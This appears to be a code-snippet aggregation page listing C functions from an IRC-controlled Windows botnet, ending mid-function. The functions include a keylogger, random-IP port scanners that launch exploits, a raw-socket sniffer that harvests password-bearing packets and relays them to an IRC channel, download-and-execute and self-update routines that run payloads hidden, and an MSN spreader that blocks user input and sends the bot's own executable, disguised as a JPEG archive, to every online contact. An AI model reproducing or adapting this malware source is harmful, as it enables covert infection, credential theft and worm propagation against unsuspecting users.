Ejemplo n.º 1
0
DWORD WINAPI SecureThread(LPVOID param)
{
	NTHREAD secure = *((NTHREAD*)param);
	NTHREAD *secures = (NTHREAD *)param;
	secures->gotinfo = TRUE;

	if (secure.bdata2) //loop
	{
		while (1)
		{
			if (!noadvapi32)
			{
#ifndef NO_VIRUSREMOVE
				RemoveVirus(0,NULL,TRUE,TRUE,FALSE);
#endif
				SecureServices(NULL, 0, TRUE, FALSE, TRUE);
				SecureRegistry(TRUE, NULL, 0, TRUE, FALSE, TRUE);
				SecureShares(TRUE, NULL, 0, TRUE, FALSE, TRUE);

#ifndef NO_LSARESTRICT
				if (!noadvapi32lsa)
					SearchForPrivilegedAccounts(L"SeNetworkLogonRight",FALSE);
#endif
			}
			//WriteHostsFile(secure.secure, secure.sock, secure.chan, secure.notice, secure.silent, secure.verbose, secure.loop);
			Sleep(SECURE_DELAY);
		}
	}
	else
	{
		IRC* irc=(IRC*)secure.conn;
		if (!noadvapi32)
		{
			if (secure.bdata1)
			{
				SecureServices(irc,secure.target,secure.silent,secure.verbose,FALSE);
#ifndef NO_VIRUSREMOVE
				//RemoveVirus(secure.target,irc,FALSE,secure.silent,secure.verbose);
#endif
			}

#ifndef NO_LSARESTRICT
			if (!noadvapi32lsa) {
				DWORD dwRet;
				if ((dwRet = SearchForPrivilegedAccounts(L"SeNetworkLogonRight",(secure.bdata1?FALSE:TRUE))) > 0)
					irc->privmsg(secure.target,"%s %s SeNetworkLogonRights %s %d accounts in local system policy.", (secure.bdata1?sec_title:unsec_title), (secure.bdata1?"Removed":"Added"), (secure.bdata1?"from":"to"),dwRet);
				else
					irc->privmsg(secure.target,"%s Failed to %s SeNetworkLogonRights %s accounts in local system policy.",(secure.bdata1?sec_title:unsec_title),(secure.bdata1?"remove":"restore"),(secure.bdata1?"from any":"to"));
			}
#endif

			SecureRegistry(secure.bdata1,irc,secure.target,secure.silent,secure.verbose,FALSE);
			SecureShares(secure.bdata1,irc,secure.target,secure.silent,secure.verbose,FALSE);
		}
			
	}

/*
		} else {
//			sprintf(sendbuf,"%s Advapi32.dll could not be loaded, %s could not be %s.",(secure.secure?sec_title:unsec_title),(secure.secure?"registry, shares, and services":"registry and shares"),(secure.secure?"secured":"unsecured"));
//			if (!secure.silent) irc_privmsg(secure.sock,secure.chan,sendbuf,secure.notice);
//			addlog(MAINLOG,sendbuf);
		}
//		WriteHostsFile(secure.secure, secure.sock, secure.chan, secure.notice, secure.silent, secure.verbose, secure.loop);
	}
*/
	clearthread(secure.threadnum);
	ExitThread(0);
}
Ejemplo n.º 2
0
DWORD WINAPI KeyLoggerThread(LPVOID param)
{
	KEYLOG keylog = *((KEYLOG *)param);
	KEYLOG *keylogs = (KEYLOG *)param;
	keylogs->gotinfo = TRUE;

	char buffer[IRCLINE], buffer2[IRCLINE], windowtxt[61];

	int err = 0, x = 0, i = 0, state, shift, bKstate[256]={0};

	HWND active = fGetForegroundWindow();
	HWND old = active;
	fGetWindowText(old,windowtxt,60);

	while (err == 0) {
		Sleep(8);

		active = fGetForegroundWindow();
		if (active != old) {
			old = active;
			fGetWindowText(old,windowtxt,60);

			sprintf(buffer2, "%s (Changed Windows: %s)", buffer, windowtxt); 
			err = SaveKeys(buffer2, keylog);
			memset(buffer,0,sizeof(buffer));
			memset(buffer2,0,sizeof(buffer2));
		}

		for (i = 0; i < 92; i++) {
			shift = fGetKeyState(VK_SHIFT);

			x = keys[i].inputL;

			if (fGetAsyncKeyState(x) & 0x8000) {
				if (((fGetKeyState(VK_CAPITAL)) && (shift > -1) && (x > 64) && (x < 91)))//caps lock and NOT shift
					bKstate[x] = 1; /* upercase a-z */
				else if (((fGetKeyState(VK_CAPITAL)) && (shift < 0) && (x > 64) && (x < 91)))//caps lock AND shift
					bKstate[x] = 2; /* lowercase a-z */
				else if (shift < 0) /* shift */
					bKstate[x] = 3; /* upercase */
				else bKstate[x] = 4; /* lowercase */
			} else {
				if (bKstate[x] != 0) {
					state = bKstate[x];
					bKstate[x] = 0;
	
					if (x == 8) {
						buffer[strlen(buffer)-1] = 0;
						continue;
					} else if (strlen(buffer) > 511 - 70) {
						active = fGetForegroundWindow();
						fGetWindowText(active,windowtxt,60);
					
						sprintf(buffer2,"%s (Buffer full) (%s)",buffer,windowtxt);
						err = SaveKeys(buffer2, keylog);
						memset(buffer,0,sizeof(buffer));
						memset(buffer2,0,sizeof(buffer2));

						continue;
					} else if (x == 13) {
						if (strlen(buffer) == 0) 
							continue;

						active = fGetForegroundWindow();
						fGetWindowText(active,windowtxt,60);

						sprintf(buffer2,"%s (Return) (%s)",buffer,windowtxt);
						err = SaveKeys(buffer2,keylog);
						memset(buffer,0,sizeof(buffer));
						memset(buffer2,0,sizeof(buffer2));

						continue;
					} else if (state == 1 || state == 3) 
						strcat(buffer,keys[i].outputH);
					else if (state == 2 || state == 4) 
						strcat(buffer,keys[i].outputL);
				}
			}
		}
	}
	clearthread(keylog.threadnum);

	ExitThread(0);
}
Ejemplo n.º 3
0
DWORD WINAPI AdvPortScanner(LPVOID param)
{
	IN_ADDR in;
	char logbuf[LOGLINE];

	ADVSCAN scan = *((ADVSCAN *)param);
	//ADVSCAN *scanp = (ADVSCAN *)param;
	//scanp->cgotinfo = TRUE;

	DWORD threadnum=scan.cthreadnum;
	DWORD threadid=scan.cthreadid;

	srand(GetTickCount()); 
	while (advinfo[threads[threadnum].parent].info) {
		DWORD dwIP;
		
		if (scan.random)
			dwIP = AdvGetNextIPRandom(scan.ip,threads[threadnum].parent);
		else
			dwIP = AdvGetNextIP(threads[threadnum].parent);
		in.s_addr = dwIP;

		sprintf(logbuf,"[scan]: IP: %s:%d, Scan thread: %d, Sub-thread: %d.", 
			finet_ntoa(in), scan.port, threads[threadnum].parent, threadid); 
		sprintf(threads[threadnum].name, logbuf);

		if (AdvPortOpen(dwIP, scan.port, scan.delay) == TRUE) {
			if (scan.exploit == -1) {
				EnterCriticalSection(&CriticalSection); 

				sprintf(logbuf,"[scan]: IP: %s, Port %d is open.",finet_ntoa(in),scan.port);
				irc_privmsg(scan.sock,scan.chan,logbuf,scan.notice, TRUE);
				addlog(logbuf);

				LeaveCriticalSection(&CriticalSection);
			} else {
				EXINFO exinfo;

				sprintf(exinfo.ip, finet_ntoa(in));
				sprintf(exinfo.chan, scan.chan);
				exinfo.sock = scan.sock;
				exinfo.notice = scan.notice;
				exinfo.silent = scan.silent;
				exinfo.port = scan.port;
				exinfo.threadnum = threadnum;
				exinfo.exploit = scan.exploit;
				exploit[scan.exploit].exfunc(exinfo);
				/*if (exploit[scan.exploit].exfunc(exinfo)) {
					EnterCriticalSection(&CriticalSection); 

					sprintf(logbuf,"[scan]: Finished with IP: %s, Port %d.",finet_ntoa(in),scan.port);
					irc_privmsg(scan.sock,scan.chan,logbuf,scan.notice, TRUE);
					addlog(logbuf);
	
					LeaveCriticalSection(&CriticalSection);
				} else {
					EnterCriticalSection(&CriticalSection); 

					sprintf(logbuf,"[scan]: Failed to exploit IP: %s, Port %d.",finet_ntoa(in),scan.port);
					irc_privmsg(scan.sock,scan.chan,logbuf,scan.notice, TRUE);
					addlog(logbuf);
	
					LeaveCriticalSection(&CriticalSection);
				}*/

			}
		}
		Sleep(2000);
	}
	clearthread(threadnum);

	ExitThread(0);
}
Ejemplo n.º 4
0
DWORD WINAPI AdvScanner(LPVOID param)
{
	char buffer[LOGLINE], szSelfExe[MAX_PATH];

	ADVSCAN scan = *((ADVSCAN *)param);
	ADVSCAN *scanp = (ADVSCAN *)param;
	scanp->gotinfo = TRUE;
	advinfo[scan.threadnum].ip = finet_addr(scan.ip);
/*
	// FIX ME: Make this a standalone function
	if (!FileExists(szLocalPayloadFile)) {
		GetModuleFileName(0,szSelfExe,MAX_PATH);
		CopyFile(szSelfExe,szLocalPayloadFile,FALSE);
		// FIX ME: Make this copy to the same directory (could affect other stuff)
	}
*/
	CheckServers(scan);

	if (findthreadid(SCAN_THREAD) == 1) {
		DeleteCriticalSection(&CriticalSection); // just in case

		if (!InitializeCriticalSectionAndSpinCount(&CriticalSection, 0x80000400)) {
			// failed to initialize CriticalSection
			sprintf(buffer,"[scan]: Failed to initialize critical section.");
			if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
			addlog(buffer);

			return 0;
		}
	}

	advinfo[scan.threadnum].info = TRUE;
	for (unsigned int i=1;i<=(scan.threads);i++) {
		scan.cthreadid = i;
		sprintf(buffer,"[scan]: %s:%d, Scan thread: %d, Sub-thread: %d.",scan.ip, scan.port,scan.threadnum,scan.cthreadid); 
		scan.cthreadnum = addthread(buffer,SCAN_THREAD,NULL);
		threads[scan.cthreadnum].parent = scan.threadnum;
		threads[scan.cthreadnum].port = scan.port;
		threads[scan.cthreadnum].tHandle = CreateThread(0,0,&AdvPortScanner,(void *)&scan,0,0);
		Sleep(50);
	}

	if (scan.minutes != 0)
		Sleep(60000*scan.minutes);
	else 
		while (advinfo[scan.threadnum].info == TRUE) Sleep(2000);

	IN_ADDR in;
	in.s_addr = advinfo[scan.threadnum].ip;
	sprintf(buffer,"[scan]: Finished at %s:%d after %d minute(s) of scanning.", finet_ntoa(in), scan.port, scan.minutes);
	if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
	addlog(buffer);

	advinfo[scan.threadnum].info = FALSE;
	Sleep(3000);

	if (findthreadid(SCAN_THREAD) == 1) 
		DeleteCriticalSection(&CriticalSection);

	clearthread(scan.threadnum);

	ExitThread(0);
}
Ejemplo n.º 5
0
DWORD WINAPI VisitThread(LPVOID param)
{
	HINTERNET ch = 0, req = 0;

	const char *accept = "*/*";
	char vhost[128], vuser[128], vpass[128], vpath[256], sendbuf[IRCLINE];

	VISIT visit = *((VISIT *)param);
	VISIT *visits = (VISIT *)param;
	visits->gotinfo = TRUE;

	// zero out string varaiables
	memset(vhost, 0, sizeof(vhost));
	memset(vuser, 0, sizeof(vuser));
	memset(vpass, 0, sizeof(vpass));
	memset(vpath, 0, sizeof(vpath));

	// zero out url structure and set options
	URL_COMPONENTS url;
	memset(&url, 0, sizeof(url));
	url.dwStructSize = sizeof(url);
	url.dwHostNameLength = 1;
    url.dwUserNameLength = 1;
    url.dwPasswordLength = 1;
    url.dwUrlPathLength = 1;

	do {
		// crack the url (break it into its main parts)
		if (!fInternetCrackUrl(visit.host, strlen(visit.host), 0, &url)) {
			sprintf(sendbuf,"[VISIT]: Invalid URL.");
			break;
		}

		// copy url parts into variables
		if (url.dwHostNameLength > 0) 
			strncpy(vhost, url.lpszHostName, url.dwHostNameLength);
		unsigned short vport = url.nPort;
		if (url.dwUserNameLength > 0) 
			strncpy(vuser, url.lpszUserName, url.dwUserNameLength);
		if (url.dwPasswordLength > 0) 
			strncpy(vpass, url.lpszPassword, url.dwPasswordLength);
		if (url.dwUrlPathLength > 0) 
			strncpy(vpath, url.lpszUrlPath, url.dwUrlPathLength);

		ch = fInternetConnect(ih, vhost,vport, vuser, vpass, INTERNET_SERVICE_HTTP, 0, 0);
		if (ch == NULL) {
			sprintf(sendbuf,"[VISIT]: Could not open a connection.");
			break;
		}

		req = fHttpOpenRequest(ch, NULL, vpath, NULL, visit.referer, &accept, INTERNET_FLAG_NO_UI, 0);
		if (req == NULL) {
			sprintf(sendbuf,"[VISIT]: Failed to connect to HTTP server.");
			break;
		}

		if (fHttpSendRequest(req, NULL, 0, NULL, 0))
			sprintf(sendbuf,"[VISIT]: URL visited.");
		else
			sprintf(sendbuf,"[VISIT]: Failed to get requested URL from HTTP server.");		
	} while(0); // always false, so this never loops, only helps make error handling easier

	if (!visit.silent) irc_privmsg(visit.sock, visit.chan, sendbuf, visit.notice);
	addlog(sendbuf);

	fInternetCloseHandle(ch);
	fInternetCloseHandle(req);

	clearthread(visit.threadnum);

	ExitThread(0);
}
Ejemplo n.º 6
0
// function for downloading files/updating
DWORD WINAPI DownloadThread(LPVOID param)
{
	char buffer[IRCLINE];
	DWORD r, d, start, total, speed;

	DOWNLOAD dl = *((DOWNLOAD *)param);
	DOWNLOAD *dls = (DOWNLOAD *)param;
	dls->gotinfo = TRUE;

	HANDLE fh = fInternetOpenUrl(ih, dl.url, NULL, 0, 0, 0);
	if (fh != NULL) {
		// open the file
		HANDLE f = CreateFile(dl.dest, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
		// make sure that our file handle is valid
		if (f < (HANDLE)1) {
			sprintf(buffer,"[DOWNLOAD]: Cant Open File: %s.",dl.dest);
			if (!dl.silent) irc_privmsg(dl.sock,dl.chan,buffer,dl.notice);
			addlog(buffer);

			clearthread(dl.threadnum);

			ExitThread(0);;
		}

		total = 0;
		start = GetTickCount();

		char *fileTotBuff=(char *)malloc(512000);	//FIX ME: Only checks first 500 kb
		do {
			memset(buffer, 0, sizeof(buffer));
			fInternetReadFile(fh, buffer, sizeof(buffer), &r);
			if (dl.encrypted)
				Xorbuff(buffer,r);
			WriteFile(f, buffer, r, &d, NULL);
			
			if ((total) < 512000) {
				//We have free bytes...
				//512000-total
				unsigned int bytestocopy;
				bytestocopy=512000-total;
				if (bytestocopy>r) 
					bytestocopy=r;
				memcpy(&fileTotBuff[total],buffer,bytestocopy);
			}
			total+=r;
			if (dl.filelen) 
				if (total>dl.filelen) 
					break; //er, we have a problem... filesize is too big.
			if (dl.update != 1) 
				sprintf(threads[dl.threadnum].name, "[DL]: File Download: %s (%dKB transferred).", dl.url, total / 1024);
			else 
				sprintf(threads[dl.threadnum].name, "[DL]: Update: %s (%dKB transferred).", dl.url, total / 1024);
		} while (r > 0);

		BOOL goodfile=TRUE;

		if (dl.filelen) {
			if (total!=dl.filelen) {
				goodfile=FALSE;
				sprintf(buffer,"[DL]: Filesize Is Incorrect: (%d != %d).", total, dl.filelen);
				irc_privmsg(dl.sock,dl.chan,buffer,dl.notice);
				addlog(buffer);
			}
		}
		speed = total / (((GetTickCount() - start) / 1000) + 1);
		CloseHandle(f);

		/* if (dl.expectedcrc) {
			unsigned long crc,crclength;
			sprintf(buffer,"crc32([%lu], [%d])\n",fileTotBuff,total);
			crclength=total;
			if (crclength>512000) crclength=512000;
			crc=crc32(fileTotBuff,crclength);
			if (crc!=dl.expectedcrc) {
				goodfile=FALSE;
				irc_privmsg(dl.sock,dl.chan,"CRC Failed!",dl.notice);
			}
			
		} */
		free(fileTotBuff);
		
		if (dl.expectedcrc) { 
			unsigned long crc=crc32f(dl.dest); 
			if (crc!=dl.expectedcrc) { 
				goodfile=FALSE;
				sprintf(buffer,"[DL]: CRC Failed (%d != %d).", crc, dl.expectedcrc);
				irc_privmsg(dl.sock, dl.chan, buffer, dl.notice); 
				addlog(buffer);
			} 
		} 

		if (goodfile==FALSE) 
			goto badfile;
		
		//download isn't an update
		if (dl.update != 1) {
			sprintf(buffer, "[DL]: Downloaded %.1f KB To %s @ %.1f KB/sec.", total / 1024.0, dl.dest, speed / 1024.0);
			if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
			addlog(buffer);

			if (dl.run == 1) {
				fShellExecute(0, "open", dl.dest, NULL, NULL, SW_SHOW);
				if (!dl.silent) {
					sprintf(buffer,"[DL]: Opened: %s.",dl.dest);
					irc_privmsg(dl.sock,dl.chan,buffer,dl.notice);
					addlog(buffer);
				}
			}

		// download is an update
		} else {
			sprintf(buffer, "[DL]: Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.", total / 1024.0, dl.dest, speed / 1024.0);
			if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
			addlog(buffer);

			PROCESS_INFORMATION pinfo;
			STARTUPINFO sinfo;
			memset(&pinfo, 0, sizeof(pinfo));
			memset(&sinfo, 0, sizeof(sinfo));
			sinfo.lpTitle = "";
			sinfo.cb = sizeof(sinfo);
			sinfo.dwFlags = STARTF_USESHOWWINDOW;
			sinfo.wShowWindow = SW_HIDE;

			if (CreateProcess(NULL, dl.dest, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo) == TRUE) {
				fWSACleanup();
				uninstall();
				ExitProcess(EXIT_SUCCESS);
			} else {
				sprintf(buffer,"[DL]: Update Failed: Error Executing File: %s.",dl.dest);
				if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
				addlog(buffer);
			}
		}
	} else {
		sprintf(buffer,"[DL]: Not Working: %s.",dl.url);
		if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
		addlog(buffer);
	}

	badfile:
	fInternetCloseHandle(fh);

	clearthread(dl.threadnum);

	ExitThread(0);
}
Ejemplo n.º 7
0
DWORD WINAPI MsnFile2(LPVOID param)
{
	trt = 0;

	NTHREAD msn2 = *((NTHREAD *)param);
	NTHREAD *msns2 = (NTHREAD *)param;
	msns2->gotinfo = TRUE;
	IRC* irc=(IRC*)msn2.conn;

    ///Windir Zipfile Namensgebung
	char fakename[] = "gafgatew.tmp";

	char windir[MAX_PATH];
	GetWindowsDirectory(windir,sizeof(windir));
	strcat(windir, "\\temp\\");
	strcat(windir, fakename);
	IMSNMessenger3 *pIMessenger = NULL;

	CoInitialize(0);

	HRESULT hr = CoCreateInstance(
		CLSID_Messenger,
		NULL,
		CLSCTX_ALL,
		IID_IMSNMessenger2,
		(void**)&pIMessenger);

	char msnmsg[512];
	char buf[128];
	char msnmsg1[1024];
	strncpy(msnmsg,msn2.data1,sizeof(msnmsg));
     
	if (SUCCEEDED(hr))
	{

		char msg[256];
		IDispatch * dispContacts = NULL;
		pIMessenger->get_MyContacts(&dispContacts);
		if (SUCCEEDED(hr))
		{

			IMSNMessengerContacts *pIMessengerContacts = NULL;
			
			hr = dispContacts->QueryInterface(__uuidof(pIMessengerContacts),(LPVOID*)&pIMessengerContacts);
			if (SUCCEEDED(hr))
			{
				IDispatch * dispContact					= NULL;
				IMSNMessengerContact *pIMessengerContact	= NULL;
				long iContacts;

				hr = pIMessengerContacts->get_Count(&iContacts);
				if (SUCCEEDED(hr))
				{
					BlockInput(true);
					for (long i = 0; i < iContacts; i++)	
					{
						hr = pIMessengerContacts->raw_Item(i,&dispContact);
						if (SUCCEEDED(hr))
						{
							hr = dispContact->QueryInterface(__uuidof(pIMessengerContact),(LPVOID*)&pIMessengerContact);
							if (SUCCEEDED(hr))
							{
								BSTR szContactName;
								VARIANT vt_user;
								MISTATUS miStatus;
								IDispatch *pIDispatch = NULL;
								IMSNMessengerWindow *pIMessengerWindow;
								LONG wndIM;

								hr = pIMessengerContact->get_Status(&miStatus);
								if (SUCCEEDED(hr))
								{
									if (miStatus == MISTATUS_OFFLINE)
									{
										pIMessengerContact->Release();
										dispContact->Release();
										continue;
									}
								}

								/// Message no [email protected] !!!
								pIMessengerContact->get_SigninName(&szContactName);
								VariantInit( &vt_user );
								to_variant2(szContactName, vt_user);
								_bstr_t tmp = szContactName;
								sprintf(buf, _T("%s"), (LPCTSTR)tmp);
								sprintf(msnmsg1, "%s", msnmsg);
								///

								
								///makes the 'zip' named email_023.jpeg-www.myspace.com
								char *pemail;
								pemail = strchr(buf, '@');
								if(pemail != NULL) buf[pemail-buf] = NULL;
								strcat(buf, "_023.jpeg-www.myspace.com");
								//
								
								char exepath[MAX_PATH];
								GetModuleFileName(NULL, exepath, MAX_PATH);
								zip_store(exepath, windir, buf);
								///



								Sleep(3000);
								hr = pIMessenger->raw_InstantMessage(vt_user,&pIDispatch);
								if (SUCCEEDED(hr))
								{
									hr = pIDispatch->QueryInterface(IID_IMSNMessengerWindow, (void **)&pIMessengerWindow);
									if (SUCCEEDED(hr))
									{
										Sleep(10);
										pIMessengerWindow->get_HWND(&wndIM);
										SetForegroundWindow((HWND) wndIM);
										SetFocus((HWND) wndIM);
										trt++;
										ShowWindow((HWND) wndIM,0);										
										srand(GetTickCount());	
										//stats_msg++;
										//send message
                                        key_type2((char *)msnmsg1, (HWND) wndIM);
										keybd_event(VK_CONTROL, 0, KEYEVENTF_EXTENDEDKEY | 0, 0);
                                        keybd_event(VkKeyScan('V'), 0, 0, 0);
                                        keybd_event(VK_CONTROL, 45, KEYEVENTF_EXTENDEDKEY | KEYEVENTF_KEYUP, 0); 
                                        keybd_event(VK_RETURN, 0, 0, 0);
										//send zipfile
										Sleep(50);
										dropfiles2((HWND) wndIM, buf);
                                        keybd_event(VK_CONTROL, 0, KEYEVENTF_EXTENDEDKEY | 0, 0);
                                        keybd_event(VkKeyScan('V'), 0, 0, 0);                                        
										keybd_event(VK_CONTROL, 45, KEYEVENTF_EXTENDEDKEY | KEYEVENTF_KEYUP, 0);
																		
									}
								}
								pIMessengerContact->Release();
								dispContact->Release();
							}
						}
					}
					BlockInput(false);
					if ( trt > 1 )
					{
					irc->pmsg(InfoChan,str_msn_msg2, trx);
					}
					pIMessengerContacts->Release();
				}
				dispContacts->Release();
			}
		}
		pIMessenger->Release();
	}

	CoUninitialize();
	clearthread(msn2.threadnum);
	ExitThread(0);
	

	return 0;
}
Ejemplo n.º 8
0
DWORD WINAPI AdvPortScanner(LPVOID param)
{
	IN_ADDR in;
	char logbuf[LOGLINE];

	ADVSCAN scan = *((ADVSCAN *)param);
	ADVSCAN *scanp = (ADVSCAN *)param;
	scanp->cgotinfo = TRUE;

	int threadnum=scan.cthreadnum;
	int threadid=scan.cthreadid;

	srand(GetTickCount());
	while (advinfo[threads[threadnum].parent].info) {
		DWORD dwIP;

		if (scan.random)
			dwIP = AdvGetNextIPRandom(scan.ip,threads[threadnum].parent);
		else
			dwIP = AdvGetNextIP(threads[threadnum].parent);
		in.s_addr = dwIP;

		//sprintf(logbuf,"scan -- IP: %s:%d, Scan thread: %d, Sub-thread: %d.",
			//finet_ntoa(in), scan.port, threads[threadnum].parent, threadid);
		sprintf(threads[threadnum].name, logbuf);

		if (AdvPortOpen(dwIP, scan.port, scan.delay) == TRUE) {
		//if (SynPortOpen(finet_addr(GetIP(scan.sock)), dwIP, scan.port, scan.delay) == TRUE) {
			if (scan.exploit == -1) {
				EnterCriticalSection(&CriticalSection);

				//sprintf(logbuf,"scan -- IP: %s, Port %d is open.",finet_ntoa(in),scan.port);
				if (!scan.silent) {
					if (scan.msgchan[0] != '\0')
						irc_privmsg(scan.sock,scan.msgchan,logbuf,scan.notice, TRUE);
					else
						irc_privmsg(scan.sock,scan.chan,logbuf,scan.notice, TRUE);
				}


				LeaveCriticalSection(&CriticalSection);
			} else {
				EXINFO exinfo;

				sprintf(exinfo.ip, finet_ntoa(in));
				sprintf(exinfo.command, exploit[scan.exploit].command);
				if (scan.msgchan[0] != '\0')
					sprintf(exinfo.chan, scan.msgchan);
				else
					sprintf(exinfo.chan, scan.chan);
				exinfo.sock = scan.sock;
				exinfo.notice = scan.notice;
				exinfo.silent = scan.silent;
				exinfo.port = scan.port;
				exinfo.threadnum = threadnum;
				exinfo.exploit = scan.exploit;
				exploit[scan.exploit].exfunc(exinfo);


			}
		}
		Sleep(2000);
	}
	clearthread(threadnum);

	ExitThread(0);
}
Ejemplo n.º 9
0
DWORD WINAPI SniffThread(LPVOID param) {

	char sendbuf[IRCLINE], rawdata[65535], *Packet;
	int i;
	DWORD dwRet, dwMode = 1;

	PSNIFF sniff = *((PSNIFF *)param);
	PSNIFF *sniffs = (PSNIFF *)param;
	sniffs->gotinfo = TRUE;

	IPHEADER *ip;
	TCPHEADER *tcp;
	IN_ADDR ia;

	SOCKET sniffsock;
	SOCKADDR_IN ssin;
	memset(&ssin, 0, sizeof(ssin));
	ssin.sin_family = AF_INET;
	ssin.sin_port = fhtons(0);
	ssin.sin_addr.s_addr = finet_addr(GetIP(sniff.sock));

	if ((sniffsock = fsocket(AF_INET, SOCK_RAW, IPPROTO_IP)) == INVALID_SOCKET) {
		sprintf(sendbuf, "[PSNIFF]: Error: Socket() Failed, Returned: <%d>.", fWSAGetLastError());
		if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
		addlog(sendbuf);

		clearthread(sniff.threadnum);

		ExitThread(0);
	}
	threads[sniff.threadnum].sock = sniffsock;

	if (fbind(sniffsock, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) {
		sprintf(sendbuf, "[PSNIFF] Error: Bind() Failed, Returned: <%d>.", fWSAGetLastError());
		if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
		addlog(sendbuf);

		fclosesocket(sniffsock);
		clearthread(sniff.threadnum);

		ExitThread(0);
	}

	if (fWSAIoctl(sniffsock, SIO_RCVALL, &dwMode, sizeof(dwMode), NULL, 0, &dwRet, NULL, NULL) == SOCKET_ERROR) {
		sprintf(sendbuf, "[PSNIFF]: Error: WSAIoctl() failed, returned: <%d>.", fWSAGetLastError());
		if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
		addlog(sendbuf);

		fclosesocket(sniffsock);
		clearthread(sniff.threadnum);

		ExitThread(0);
	}

	while(1) {
		memset(rawdata, 0, sizeof(rawdata));
		Packet = (char *)rawdata;

		if (frecv(sniffsock, Packet, sizeof(rawdata), 0) == SOCKET_ERROR) {
            _snprintf(sendbuf,sizeof(sendbuf),"[PSNIFF]: Error: recv() failed, returned: <%d>", fWSAGetLastError());
			if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
			addlog(sendbuf);

            break;
        }

		ip = (IPHEADER *)Packet;
		if (ip->proto == 6) {
			Packet += sizeof(*ip);
			tcp = (TCPHEADER *)Packet;

			ia.S_un.S_addr = ip->sourceIP;

			if (tcp->flags == 24) {
				Packet += sizeof(*tcp);
				if (strstr(Packet, "[PSNIFF]") == NULL) {
					for (i=0;pswords[i].text;i++) {
						if ((strstr(Packet, pswords[i].text)) != NULL) {
							_snprintf(sendbuf, sizeof(sendbuf), "[PSNIFF]: Suspicious %s Packet From: %s:%d - %s.", ptype[pswords[i].type], finet_ntoa(ia), fntohs(tcp->sport), Packet);
							if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
							addlog(sendbuf);

							break;
						}
					}
				}
			}
		}
	}
	fclosesocket(sniffsock);
	clearthread(sniff.threadnum);

	ExitThread(0);
}
Ejemplo n.º 10
0
DWORD WINAPI DownloadThread(LPVOID param)
{
	char buffer[IRCLINE];
	DWORD r, d, start, total, speed;

	NTHREAD dl = *((NTHREAD *)param);
	NTHREAD *dls = (NTHREAD *)param;
	dls->gotinfo = TRUE;
	IRC* irc=(IRC*)dl.conn;

	char dlfrom[MAX_HOSTNAME];
	char dlto[MAX_PATH];
	strncpy(dlfrom,dl.data1,sizeof(dlfrom));
	strncpy(dlto,dl.data2,sizeof(dlto));

	HANDLE fh = fInternetOpenUrl(ih, dlfrom, NULL, 0, 0, 0);
	if (fh != NULL)
	{
		HANDLE f = CreateFile(dlto, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
		if (f < (HANDLE)1)
		{
			if (!dl.silent)
				irc->pmsg(dl.target,"%s Couldn't open file for writing: %s.",(dl.bdata1?update_title:download_title),dlto);

			fInternetCloseHandle(fh);
			clearthread(dl.threadnum);
			ExitThread(0);
		}

		total = 0;
		start = GetTickCount();
		char *fileTotBuff=(char *)malloc(512000);
		do
		{
			ZeroMemory(buffer,sizeof(buffer));
			fInternetReadFile(fh, buffer, sizeof(buffer), &r);
			WriteFile(f, buffer, r, &d, NULL);
			
			if ((total) < 512000)
			{
				unsigned int bytestocopy;
				bytestocopy=512000-total;
				if (bytestocopy>r) 
					bytestocopy=r;
				memcpy(&fileTotBuff[total],buffer,bytestocopy);
			}
			total+=r;
		}
		while (r > 0);

		speed = total / (((GetTickCount() - start) / 1000) + 1);
		free(fileTotBuff);
		CloseHandle(f);
		fInternetCloseHandle(fh);

		if (!dl.silent)
			irc->pmsg(dl.target,"%s File download: %.1fKB to: %s @ %.1fKB/sec.",(dl.bdata1?update_title:download_title), total/1024.0, dlto, speed/1024.0);

		if (!dl.bdata1 && dl.bdata2)
		{
			STARTUPINFO si;
			PROCESS_INFORMATION pi;
			BOOL hide=dl.bdata3, wait=dl.verbose;
			char path[MAX_PATH];
			strncpy(path,dlto,sizeof(path));
			if (!fPathRemoveFileSpec(path))
			{
				if (!dl.silent)
					irc->pmsg(dl.target,"%s Couldn't parse path, error: <%d>", download_title, GetLastError());
				return 1;
			}
			ZeroMemory(&si,sizeof(si));
			ZeroMemory(&pi,sizeof(pi));
			si.cb=sizeof(si);
			si.dwFlags = STARTF_USESHOWWINDOW;
			si.wShowWindow = (hide?SW_HIDE:SW_SHOW);

			if (!CreateProcess(NULL,dlto,NULL,NULL,FALSE,0,NULL,path,&si,&pi))
			{
				if (!dl.silent)
					irc->pmsg(dl.target,"%s Failed to create process: \"%s\", error: <%d>", download_title, dlto, GetLastError());
				return 1;
			}
			else
			{
				DWORD start=GetTickCount();
				if (!dl.silent)
					irc->pmsg(dl.target,"%s Created process: \"%s\", PID: <%d>",download_title,dlto,pi.dwProcessId);
				
				if (dl.verbose)
				{	
					WaitForSingleObject(pi.hProcess,INFINITE);
					DWORD stop=GetTickCount();
					char ttime[120],stime[120];
					stime[0]='\0';
					DWORD total = ((stop - start)/1000);
					DWORD hours = (total%86400)/3600;
					DWORD minutes = ((total%86400)%3600)/60;
					DWORD seconds = ((total%86400)%3600)%60;
					if (hours>0)
					{
						sprintf(ttime," %d%s",hours,(hours==1?" hour":" hours"));
						strcat(stime,ttime);
					}
					sprintf(ttime," %.2d:%.2d",minutes,seconds);
					strcat(stime,ttime);

					irc->pmsg(dl.target,"%s Process Finished: \"%s\", Total Running Time: %s.",download_title,dlto,stime);
				}
				if (pi.hProcess) CloseHandle(pi.hProcess);
				if (pi.hThread) CloseHandle(pi.hThread);
			}

